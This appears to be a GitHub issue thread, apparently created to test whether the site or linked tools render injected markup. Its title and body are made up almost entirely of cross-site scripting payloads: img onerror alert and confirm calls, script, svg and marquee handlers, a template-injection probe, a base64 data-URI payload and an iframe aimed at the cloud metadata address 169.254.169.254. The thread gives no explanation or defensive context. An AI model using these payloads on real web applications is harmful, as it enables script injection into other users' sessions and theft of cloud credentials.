### ISSUE TITLE
{{ '7'*7 }}"><img src=x onerror=alert(document.domain)> ">&lt;img src=x onerror=confirm(0)&gt;

### ISSUE THREAD

**Issue by kahoygahi** [kahoygahi/-img-src-x-onerror-alert-document.domain-#2]
hello<div class="yahoo-link-enhancr-card" data-url="https://www.youtube.com/aaa&quot;&gt;&lt;img src=x onerror=alert(/xss/)&gt;&lt;">
<div class="card-share-container">
<a class="enhancr-play-btn"></a>
" onmouseover=alert(0) "
">&lt;img src=x onerror=confirm(0)&gt;
'"></title></script><img src=x onerror=confirm(1)>

<xml:namespace prefix="t">
<svg><style>&lt;img/src=x onerror=alert(document.domain)// </b>

"><script>alert(0)</script>
"><img src=x onerror=alert(document.domain)>
{{ '7'*7 }}"><img src=x onerror=alert(document.domain)>
">&lt;img src=x onerror=confirm(0)&gt;
"><marquee onstart=alert(domain)>
"><input onmouseover=alert(domain)>
data:text/html;base64,Ij48aW1nIHNyYz14IG9uZXJyb3I9YWxlcnQoZG9jdW1lbnQuZG9tYWluKT4
">&lt;iframe src="169.254.169.254/latest/meta-data/"&gt;
"><img src=x onerror=alert(1)>
![svgred](https://user-images.githubusercontent.com/114484601/303906432-2aed8fc9-15c4-4a92-aa92-9f51be53d5e2.svg)

_Originally posted by @gwapoko22 in https://github.com/kahoygahi/-img-src-x-onerror-alert-document.domain-/issues/1#issuecomment-1937468259_

**Comment by gwapoko22** [comment]
![ii](https://user-images.githubusercontent.com/114484601/303906432-2aed8fc9-15c4-4a92-aa92-9f51be53d5e2.svg)rfdrtdfv
